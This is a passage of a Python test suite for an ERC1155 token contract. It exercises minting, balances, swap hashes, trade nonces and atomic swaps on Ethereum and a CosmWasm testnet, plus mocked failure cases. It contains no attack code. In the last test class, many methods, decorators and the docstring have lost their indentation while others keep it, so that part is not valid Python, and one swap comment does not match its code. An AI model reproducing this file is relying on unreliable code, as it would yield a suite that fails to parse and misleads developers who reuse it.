        tx = self.contract.get_mint_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.item_owner_crypto.address,
            token_ids=self.token_ids_a,
            mint_quantities=[1] * len(self.token_ids_a),
        )
        # after
        assert len(tx) == 7
        assert all(
            key in tx
            for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
        )
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )

    def test_validate_mint_quantities(self):
        """Test the validate_mint_quantities method of the ERC1155 contract."""
        # Valid NFTs: one unit each.
        self.contract.validate_mint_quantities(
            token_ids=self.token_ids_a, mint_quantities=[1] * len(self.token_ids_a),
        )
        # Valid FTs
        token_id = 680564733841876926926749214863536422912
        mint_quantity = 1
        self.contract.validate_mint_quantities(
            token_ids=[token_id], mint_quantities=[mint_quantity],
        )
        # Invalid NFTs: an NFT may only ever be minted with quantity 1.
        token_id = self.token_ids_a[0]
        mint_quantity = 2
        with pytest.raises(
            ValueError,
            match=re.escape(
                f"Cannot mint NFT (token_id={token_id}) with mint_quantity more than 1 (found={mint_quantity})"
            ),
        ):
            self.contract.validate_mint_quantities(
                token_ids=[token_id], mint_quantities=[mint_quantity],
            )
        # Invalid: neither NFT nor FT (id encodes token type 3, i.e. 3 << 128).
        token_id = 1020847100762815390390123822295304634368
        mint_quantity = 1
        with pytest.raises(
            ValueError,
            match=re.escape(
                f"The token type must be 1 or 2. Found type=3 for token_id={token_id}"
            ),
        ):
            self.contract.validate_mint_quantities(
                token_ids=[token_id], mint_quantities=[mint_quantity],
            )

    def test_decode_id(self):
        """Test the decode_id method of the ERC1155 contract."""
        # FT
        expected_token_type = 2
        token_id = 680564733841876926926749214863536422912
        actual_token_type = self.contract.decode_id(token_id)
        assert actual_token_type == expected_token_type
        # NFT
        expected_token_type = 1
        token_id = 340282366920938463463374607431768211456
        actual_token_type = self.contract.decode_id(token_id)
        assert actual_token_type == expected_token_type

    def test_get_mint_single_transaction(self):
        """Test the get_mint_single_transaction method of the ERC1155 contract."""
        # operation
        tx = self.contract.get_mint_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.item_owner_crypto.address,
            token_id=self.token_id_b,
            mint_quantity=1,
        )
        # after
        assert len(tx) == 7
        assert all(
            key in tx
            for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
        )
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )

    def test_get_balance(self):
        """Test the get_balance method of the ERC1155 contract."""
        # operation
        result = self.contract.get_balance(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
            token_id=self.token_id_b,
        )
        # after: nothing minted for this token in this test, so balance is 0.
        assert "balance" in result
        assert result["balance"][self.token_id_b] == 0

    def test_get_balances(self):
        """Test the get_balances method of the ERC1155 contract."""
        # operation
        result = self.contract.get_balances(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
            token_ids=self.token_ids_a,
        )
        # after
        assert "balances" in result
        assert all(result["balances"][token_id] == 0 for token_id in self.token_ids_a)

    def test_get_hash_single(self):
        """Test the get_hash_single method of the ERC1155 contract."""
        # operation
        result = self.contract.get_hash_single(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            from_address=self.deployer_crypto.address,
            to_address=self.item_owner_crypto.address,
            token_id=self.token_id_b,
            from_supply=0,
            to_supply=10,
            value=1,
            trade_nonce=1,
        )
        # after
        assert isinstance(result, bytes)

    def test_get_hash_batch(self):
        """Test the get_hash_batch method of the ERC1155 contract."""
        # operation
        result = self.contract.get_hash_batch(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            from_address=self.deployer_crypto.address,
            to_address=self.item_owner_crypto.address,
            token_ids=self.token_ids_a,
            from_supplies=[0, 1, 0, 0, 1, 0, 0, 0, 0, 1],
            to_supplies=[0, 0, 0, 0, 0, 1, 0, 0, 0, 0],
            value=1,
            trade_nonce=1,
        )
        # after
        assert isinstance(result, bytes)

    def test_generate_trade_nonce(self):
        """Test the generate_trade_nonce method of the ERC1155 contract."""
        # operation
        result = self.contract.generate_trade_nonce(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
        )
        # after
        assert "trade_nonce" in result
        assert isinstance(result["trade_nonce"], int)

    @pytest.mark.integration
    def test_helper_methods_and_get_transactions(self):
        """Test helper methods and get transactions."""
        # NOTE(review): expected_a duplicates cls.token_ids_a from setup — kept
        # inline so the expectation is stated independently of the fixture.
        expected_a = [
            340282366920938463463374607431768211456,
            340282366920938463463374607431768211457,
            340282366920938463463374607431768211458,
            340282366920938463463374607431768211459,
            340282366920938463463374607431768211460,
            340282366920938463463374607431768211461,
            340282366920938463463374607431768211462,
            340282366920938463463374607431768211463,
            340282366920938463463374607431768211464,
            340282366920938463463374607431768211465,
        ]
        actual = self.contract.generate_token_ids(token_type=1, nb_tokens=10)
        assert expected_a == actual
        expected_b = [
            680564733841876926926749214863536422912,
            680564733841876926926749214863536422913,
        ]
        actual = self.contract.generate_token_ids(token_type=2, nb_tokens=2)
        assert expected_b == actual
        tx = self.contract.get_deploy_transaction(
            ledger_api=self.ledger_api, deployer_address=ETHEREUM_ADDRESS_ONE
        )
        # Deploy tx has no "to" field, hence 6 keys rather than 7.
        assert len(tx) == 6
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [key in tx for key in ["value", "from", "gas", "gasPrice", "nonce"]]
        ), "Error, found: {}".format(tx)
        tx = self.contract.get_create_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=ETHEREUM_ADDRESS_ONE,
            deployer_address=ETHEREUM_ADDRESS_ONE,
            token_ids=expected_a,
        )
        assert len(tx) == 7
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [
                key in tx
                for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
            ]
        ), "Error, found: {}".format(tx)
        tx = self.contract.get_create_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=ETHEREUM_ADDRESS_ONE,
            deployer_address=ETHEREUM_ADDRESS_ONE,
            token_id=expected_b[0],
        )
        assert len(tx) == 7
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [
                key in tx
                for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
            ]
        ), "Error, found: {}".format(tx)
        mint_quantities = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
        tx = self.contract.get_mint_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=ETHEREUM_ADDRESS_ONE,
            deployer_address=ETHEREUM_ADDRESS_ONE,
            recipient_address=ETHEREUM_ADDRESS_ONE,
            token_ids=expected_a,
            mint_quantities=mint_quantities,
        )
        assert len(tx) == 7
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [
                key in tx
                for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
            ]
        ), "Error, found: {}".format(tx)
        mint_quantity = 1
        tx = self.contract.get_mint_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=ETHEREUM_ADDRESS_ONE,
            deployer_address=ETHEREUM_ADDRESS_ONE,
            recipient_address=ETHEREUM_ADDRESS_ONE,
            token_id=expected_b[1],
            mint_quantity=mint_quantity,
        )
        assert len(tx) == 7
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [
                key in tx
                for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to"]
            ]
        ), "Error, found: {}".format(tx)

    @pytest.mark.integration
    def test_get_single_atomic_swap(self):
        """Test get single atomic swap."""
        from_address = ETHEREUM_ADDRESS_ONE
        to_address = ETHEREUM_ADDRESS_TWO
        token_id = self.contract.generate_token_ids(token_type=2, nb_tokens=1)[0]
        from_supply = 0
        to_supply = 10
        value = 1
        trade_nonce = 1
        # Hash of the swap terms, to be signed off-chain.
        tx_hash = self.contract.get_hash_single(
            self.ledger_api,
            self.contract_address,
            from_address,
            to_address,
            token_id,
            from_supply,
            to_supply,
            value,
            trade_nonce,
        )
        assert isinstance(tx_hash, bytes)
        signature = self.deployer_crypto.sign_message(tx_hash)
        tx = self.contract.get_atomic_swap_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            from_address=from_address,
            to_address=to_address,
            token_id=token_id,
            from_supply=from_supply,
            to_supply=to_supply,
            value=value,
            trade_nonce=trade_nonce,
            signature=signature,
        )
        # Swap tx carries an extra "from" field, hence 8 keys.
        assert len(tx) == 8
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [
                key in tx
                for key in [
                    "value",
                    "chainId",
                    "gas",
                    "gasPrice",
                    "nonce",
                    "to",
                    "from",
                ]
            ]
        ), "Error, found: {}".format(tx)

    @pytest.mark.integration
    def test_get_batch_atomic_swap(self):
        """Test get batch atomic swap."""
        from_address = ETHEREUM_ADDRESS_ONE
        to_address = ETHEREUM_ADDRESS_TWO
        token_ids = self.contract.generate_token_ids(token_type=2, nb_tokens=10)
        from_supplies = [0, 1, 0, 0, 1, 0, 0, 0, 0, 1]
        to_supplies = [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]
        value = 1
        trade_nonce = 1
        tx_hash = self.contract.get_hash_batch(
            self.ledger_api,
            self.contract_address,
            from_address,
            to_address,
            token_ids,
            from_supplies,
            to_supplies,
            value,
            trade_nonce,
        )
        assert isinstance(tx_hash, bytes)
        signature = self.deployer_crypto.sign_message(tx_hash)
        tx = self.contract.get_atomic_swap_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            from_address=from_address,
            to_address=to_address,
            token_ids=token_ids,
            from_supplies=from_supplies,
            to_supplies=to_supplies,
            value=value,
            trade_nonce=trade_nonce,
            signature=signature,
        )
        assert len(tx) == 8
        data = tx.pop("data")
        assert len(data) > 0 and data.startswith("0x")
        assert all(
            [
                key in tx
                for key in [
                    "value",
                    "chainId",
                    "gas",
                    "gasPrice",
                    "nonce",
                    "to",
                    "from",
                ]
            ]
        ), "Error, found: {}".format(tx)

    @pytest.mark.integration
    def test_full(self):
        """Run a full create / mint / atomic-swap round-trip on chain."""
        # Test tokens IDs
        token_ids = self.contract.generate_token_ids(token_type=2, nb_tokens=10)
        # create
        tx = self.contract.get_create_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_ids=token_ids,
        )
        tx_signed = self.deployer_crypto.sign_transaction(tx)
        # NOTE(review): send_signed_transaction appears to return the tx digest
        # (it is passed to get_transaction_receipt below); the local name
        # "tx_receipt" is misleading — confirm and consider renaming.
        tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
        # Allow the transaction to be processed before querying the receipt.
        time.sleep(1)
        receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
        assert self.ledger_api.is_transaction_settled(receipt)
        mint_quantities = [10] * len(token_ids)
        # mint to deployer
        tx = self.contract.get_mint_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.deployer_crypto.address,
            token_ids=token_ids,
            mint_quantities=mint_quantities,
        )
        tx_signed = self.deployer_crypto.sign_transaction(tx)
        tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
        time.sleep(1)
        receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
        assert self.ledger_api.is_transaction_settled(receipt)
        # mint to item owner
        tx = self.contract.get_mint_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.item_owner_crypto.address,
            token_ids=token_ids,
            mint_quantities=mint_quantities,
        )
        tx_signed = self.deployer_crypto.sign_transaction(tx)
        tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
        time.sleep(1)
        receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
        assert self.ledger_api.is_transaction_settled(receipt)
        # batch trade
        from_address = self.deployer_crypto.address
        to_address = self.item_owner_crypto.address
        from_supplies = [0, 1, 0, 0, 1, 0, 0, 0, 0, 1]
        to_supplies = [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]
        value = 0
        trade_nonce = 1
        tx_hash = self.contract.get_hash_batch(
            self.ledger_api,
            self.contract_address,
            from_address,
            to_address,
            token_ids,
            from_supplies,
            to_supplies,
            value,
            trade_nonce,
        )
        # The counterparty (item owner) signs the swap terms; the deployer
        # then signs and submits the transaction itself.
        signature = self.item_owner_crypto.sign_message(
            tx_hash, is_deprecated_mode=True
        )
        tx = self.contract.get_atomic_swap_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            from_address=from_address,
            to_address=to_address,
            token_ids=token_ids,
            from_supplies=from_supplies,
            to_supplies=to_supplies,
            value=value,
            trade_nonce=trade_nonce,
            signature=signature,
        )
        tx_signed = self.deployer_crypto.sign_transaction(tx)
        tx_receipt = self.ledger_api.send_signed_transaction(tx_signed)
        time.sleep(1)
        receipt = self.ledger_api.get_transaction_receipt(tx_receipt)
        assert self.ledger_api.is_transaction_settled(receipt)
class TestCosmWasmContract(BaseContractTestCase):
    """Test the cosmwasm contract (against the FetchAI testnet)."""

    ledger_identifier = FetchAICrypto.identifier
    path_to_contract = Path(ROOT_DIR, "packages", "fetchai", "contracts", "erc1155")
    # Fund the test keys from the testnet faucet before running.
    fund_from_faucet = True

    @classmethod
    def setup(cls):
        """Set up the test case: deploy the contract and prepare test token ids."""
        # Test tokens IDs
        super().setup(ledger_config=FETCHAI_TESTNET_CONFIG)
        # Ten NFT-type ids (type 1) and one FT-type id (type 2), mirroring
        # the Ethereum test case above.
        cls.token_ids_a = [
            340282366920938463463374607431768211456,
            340282366920938463463374607431768211457,
            340282366920938463463374607431768211458,
            340282366920938463463374607431768211459,
            340282366920938463463374607431768211460,
            340282366920938463463374607431768211461,
            340282366920938463463374607431768211462,
            340282366920938463463374607431768211463,
            340282366920938463463374607431768211464,
            340282366920938463463374607431768211465,
        ]
        cls.token_id_b = 680564733841876926926749214863536422912

    @classmethod
    def finish_contract_deployment(cls) -> str:
        """
        Finish deploying contract.

        CosmWasm deployment is two-step: the stored code id is read from the
        store-code receipt, then an instantiate transaction is submitted.

        :return: contract address
        """
        code_id = cast(FetchAIApi, cls.ledger_api).get_code_id(
            cls.deployment_tx_receipt
        )
        assert code_id is not None
        # Init contract
        tx = cls._contract.get_deploy_transaction(
            ledger_api=cls.ledger_api,
            deployer_address=cls.deployer_crypto.address,
            code_id=code_id,
            init_msg={},
            tx_fee=0,
            amount=0,
            label="ERC1155",
            gas=1000000,
        )
        if tx is None:
            raise ValueError("Deploy transaction not found!")  # pragma: nocover
        tx_receipt = cls.sign_send_confirm_receipt_multisig_transaction(
            tx, cls.ledger_api, [cls.deployer_crypto]
        )
        contract_address = cls.ledger_api.get_contract_address(tx_receipt)
        if contract_address is None:
            raise ValueError("Contract address not found!")  # pragma: nocover
        return contract_address

    @pytest.mark.integration
    @pytest.mark.ledger
    @pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
    def test_create_and_mint_and_balances(self):
        """Test cosmwasm contract create, mint and balances functionalities."""
        # Create single token
        tx = self.contract.get_create_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_id=self.token_id_b,
        )
        # CosmWasm txs built here carry 2 top-level keys (cf. 7 on Ethereum).
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Create batch of tokens
        tx = self.contract.get_create_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_ids=self.token_ids_a,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Mint single token
        tx = self.contract.get_mint_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.item_owner_crypto.address,
            token_id=self.token_id_b,
            mint_quantity=1,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Get balance of single token
        res = self.contract.get_balance(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
            token_id=self.token_id_b,
        )
        assert "balance" in res
        assert res["balance"][self.token_id_b] == 1
        # Mint batch of tokens
        tx = self.contract.get_mint_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.item_owner_crypto.address,
            token_ids=self.token_ids_a,
            mint_quantities=[1] * len(self.token_ids_a),
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Get balances of multiple tokens
        res = self.contract.get_balances(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
            token_ids=self.token_ids_a,
        )
        assert "balances" in res
        assert res["balances"] == {token_id: 1 for token_id in self.token_ids_a}

    @pytest.mark.integration
    @pytest.mark.ledger
    @pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
    def test_cosmwasm_single_atomic_swap(self):
        """Test single atomic swap."""
        # Create batch of tokens
        tx = self.contract.get_create_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_ids=self.token_ids_a,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Mint single ERC1155 token a[0] to Deployer
        tx = self.contract.get_mint_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.deployer_crypto.address,
            token_id=self.token_ids_a[0],
            mint_quantity=1,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Store balance of Deployer's native tokens before atomic swap
        original_deployer_balance = self.ledger_api.get_balance(
            self.deployer_crypto.address
        )
        # Atomic swap
        # Send 1 ERC1155 token a[0] from Deployer to Item owner
        # Send 1 native token from Item owner to Deployer
        tx = self.contract.get_atomic_swap_single_transaction(
            self.ledger_api,
            contract_address=self.contract_address,
            from_address=self.deployer_crypto.address,
            to_address=self.item_owner_crypto.address,
            token_id=self.token_ids_a[0],
            from_supply=1,
            to_supply=0,
            value=1,
            trade_nonce=0,
            from_pubkey=self.deployer_crypto.public_key,
            to_pubkey=self.item_owner_crypto.public_key,
        )
        assert len(tx) == 2
        # Both parties sign: the swap moves assets in each direction.
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto, self.item_owner_crypto]
        )
        # Check Item owner's ERC1155 token balance
        result = self.contract.get_balance(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
            token_id=self.token_ids_a[0],
        )
        assert "balance" in result
        assert result["balance"][self.token_ids_a[0]] == 1
        # Check deployer's native token balance
        deployer_balance = self.ledger_api.get_balance(self.deployer_crypto.address)
        assert deployer_balance == original_deployer_balance + 1
        # Other direction of atomic swap
        # Send 1 ERC1155 token a[0] from Item owner to Deployer
        # Send 1 native token from Item owner to Deployer
        tx = self.contract.get_atomic_swap_single_transaction(
            self.ledger_api,
            contract_address=self.contract_address,
            from_address=self.deployer_crypto.address,
            to_address=self.item_owner_crypto.address,
            token_id=self.token_ids_a[0],
            from_supply=0,
            to_supply=1,
            value=1,
            trade_nonce=0,
            from_pubkey=self.deployer_crypto.public_key,
            to_pubkey=self.item_owner_crypto.public_key,
        )
        assert len(tx) == 2
        # Only the item owner needs to sign: all assets flow from its side.
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.item_owner_crypto]
        )
        # Check Item owner's ERC1155 token balance
        result = self.contract.get_balance(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.deployer_crypto.address,
            token_id=self.token_ids_a[0],
        )
        assert "balance" in result
        assert result["balance"][self.token_ids_a[0]] == 1
        # Check deployer's native token balance
        deployer_balance = self.ledger_api.get_balance(self.deployer_crypto.address)
        assert deployer_balance == original_deployer_balance + 2
        # Check invalid case with from_supply > 0 and to_supply > 0
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_single_transaction(
                self.ledger_api,
                contract_address=self.contract_address,
                from_address=self.deployer_crypto.address,
                to_address=self.item_owner_crypto.address,
                token_id=self.token_ids_a[0],
                from_supply=1,
                to_supply=1,
                value=1,
                trade_nonce=0,
                from_pubkey=self.deployer_crypto.public_key,
                to_pubkey=self.item_owner_crypto.public_key,
            )

    @pytest.mark.integration
    @pytest.mark.ledger
    @pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
    def test_cosmwasm_batch_atomic_swap(self):
        """Test batch atomic swap."""
        # Create batch of tokens
        tx = self.contract.get_create_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_ids=self.token_ids_a,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Mint single token a[0] to Deployer
        tx = self.contract.get_mint_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.deployer_crypto.address,
            token_id=self.token_ids_a[0],
            mint_quantity=1,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Mint single token a[1] to Item owner
        tx = self.contract.get_mint_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            recipient_address=self.item_owner_crypto.address,
            token_id=self.token_ids_a[1],
            mint_quantity=1,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )
        # Store balance of Deployer's native tokens before atomic swap
        original_deployer_balance = self.ledger_api.get_balance(
            self.deployer_crypto.address
        )
        # Atomic swap
        # Send 1 ERC1155 token a[0] from Deployer to Item owner
        # Send 1 ERC1155 token a[1] from Item owner to Deployer
        # Send 1 native token from Item owner to Deployer
        tx = self.contract.get_atomic_swap_batch_transaction(
            self.ledger_api,
            contract_address=self.contract_address,
            from_address=self.deployer_crypto.address,
            to_address=self.item_owner_crypto.address,
            token_ids=[self.token_ids_a[0], self.token_ids_a[1]],
            from_supplies=[1, 0],
            to_supplies=[0, 1],
            value=1,
            trade_nonce=0,
            from_pubkey=self.deployer_crypto.public_key,
            to_pubkey=self.item_owner_crypto.public_key,
        )
        assert len(tx) == 2
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto, self.item_owner_crypto]
        )
        # Check Item owner's ERC1155 token balance
        result = self.contract.get_balance(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.item_owner_crypto.address,
            token_id=self.token_ids_a[0],
        )
        assert "balance" in result
        assert result["balance"][self.token_ids_a[0]] == 1
        # Check Deployer's ERC1155 token balance
        result = self.contract.get_balance(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            agent_address=self.deployer_crypto.address,
            token_id=self.token_ids_a[1],
        )
        assert "balance" in result
        assert result["balance"][self.token_ids_a[1]] == 1
        # Check deployer's native token balance
        deployer_balance = self.ledger_api.get_balance(self.deployer_crypto.address)
        assert deployer_balance == original_deployer_balance + 1
class TestContractCommon:
"""Other tests for the contract."""
    @classmethod
    def setup(cls):
        """Set up the test case: load the erc1155 contract package and mock a ledger api."""
        # Register smart contract used for testing
        cls.path_to_contract = Path(
            ROOT_DIR, "packages", "fetchai", "contracts", "erc1155"
        )
        # register contract
        configuration = cast(
            ContractConfig,
            load_component_configuration(ComponentType.CONTRACT, cls.path_to_contract),
        )
        configuration._directory = (  # pylint: disable=protected-access
            cls.path_to_contract
        )
        # Only load the contract module once per process; the registry is global.
        if str(configuration.public_id) not in contract_registry.specs:
            # load contract into sys modules
            Contract.from_config(configuration)
        cls.contract = contract_registry.make(str(configuration.public_id))
        # A single NFT-type id (1 << 128) is enough for the negative tests below.
        cls.token_ids_a = [
            340282366920938463463374607431768211456,
        ]
        # Create mock ledger with unknown identifier
        cls.ledger_api = mock.Mock()
        attrs = {"identifier": "dummy"}
        cls.ledger_api.configure_mock(**attrs)
@pytest.mark.ledger
def test_get_create_batch_transaction_wrong_identifier(self):
"""Test if get_create_batch_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_create_batch_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
token_ids=self.token_ids_a,
)
@pytest.mark.ledger
def test_get_create_single_transaction_wrong_identifier(self):
"""Test if get_create_single_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_create_single_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
token_id=self.token_ids_a[0],
)
@pytest.mark.ledger
def test_get_mint_batch_transaction_wrong_identifier(self):
"""Test if get_mint_batch_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_mint_batch_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
recipient_address="address",
token_ids=self.token_ids_a,
mint_quantities=[1],
)
@pytest.mark.ledger
def test_get_mint_single_transaction_wrong_identifier(self):
"""Test if get_mint_single_transaction with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_mint_single_transaction(
ledger_api=self.ledger_api,
contract_address="contract_address",
deployer_address="address",
recipient_address="address",
token_id=self.token_ids_a[0],
mint_quantity=1,
)
@pytest.mark.ledger
def test_get_balance_wrong_identifier(self):
"""Test if get_balance with wrong api identifier fails."""
# Test if function is not implemented for unknown ledger
with pytest.raises(NotImplementedError):
self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
token_id=self.token_ids_a[0],
)
@pytest.mark.ledger
def test_get_balance_wrong_query_res(self):
"""Test if get_balance with wrong api identifier fails."""
# Create mock fetchai ledger that returns None on execute_contract_query
attrs = {"identifier": "fetchai", "execute_contract_query.return_value": None}
self.ledger_api.configure_mock(**attrs)
# Test if get balance returns ValueError when querying contract returns None
with pytest.raises(ValueError):
self.contract.get_balance(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
token_id=self.token_ids_a[0],
)
@pytest.mark.ledger
def test_get_balances_wrong_query_res(self):
"""Test if get_balances with wrong api identifier fails."""
# Create mock fetchai ledger that returns None on execute_contract_query
attrs = {"identifier": "fetchai", "execute_contract_query.return_value": None}
self.ledger_api.configure_mock(**attrs)
# Test if get balance returns ValueError when querying contract returns None
with pytest.raises(ValueError):
self.contract.get_balances(
ledger_api=self.ledger_api,
contract_address="contract_address",
agent_address="address",
token_ids=self.token_ids_a,
)
    @pytest.mark.ledger
    def test_get_hash_batch_not_same(self):
        """Test if get_hash_batch returns ValueError when on-chain hash is not same as computed hash."""
        self.ledger_api.identifier = "ethereum"
        # Test if get hash returns ValueError when on chain hash is not same as computed hash.
        # _get_hash_batch is replaced by a bare Mock, so its return value can
        # never equal the locally computed hash.
        with mock.patch.object(type(self.contract), "_get_hash_batch", new=mock.Mock()):
            with pytest.raises(ValueError):
                self.contract.get_hash_batch(
                    ledger_api=self.ledger_api,
                    contract_address="contract_address",
                    from_address="address",
                    to_address="address",
                    token_ids=self.token_ids_a,
                    from_supplies=[1],
                    to_supplies=[0],
                    value=123,
                    trade_nonce=123,
                )
    @pytest.mark.ledger
    def test_generate_trade_nonce_if_exist(self):
        """Test if generate_trade_nonce retries when nonce already exist."""
        # Ethereum ledger api mock
        self.ledger_api.identifier = "ethereum"
        # instance.functions.is_nonce_used(agent_address, trade_nonce).call() -> True, False
        # (first generated nonce is reported as used, forcing one retry)
        is_nonce_used_mock = mock.Mock()
        is_nonce_used_mock.configure_mock(**{"call.side_effect": [True, False]})
        # instance.functions.is_nonce_used(agent_address, trade_nonce) -> is_nonce_used_mock with call method
        instance_mock = mock.Mock()
        instance_mock.configure_mock(
            **{"functions.is_nonce_used.return_value": is_nonce_used_mock}
        )
        # cls.get_instance(ledger_api, contract_address) -> instance_mock
        get_instance_mock = mock.Mock()
        get_instance_mock.configure_mock(**{"return_value": instance_mock})
        # Patch get_instance method to return get_instance_mock which returns instance of instance_mock when called
        with mock.patch.object(
            type(self.contract), "get_instance", new=get_instance_mock
        ):
            self.contract.generate_trade_nonce(
                ledger_api=self.ledger_api,
                contract_address="contract_address",
                agent_address="address",
            )
        # Check if is_nonce_used was called twice (one retry after the used nonce)
        assert is_nonce_used_mock.call.call_count == 2
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_eth_no_signature(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if signature not present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_single_transaction returns RuntimeError when signature is missing
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
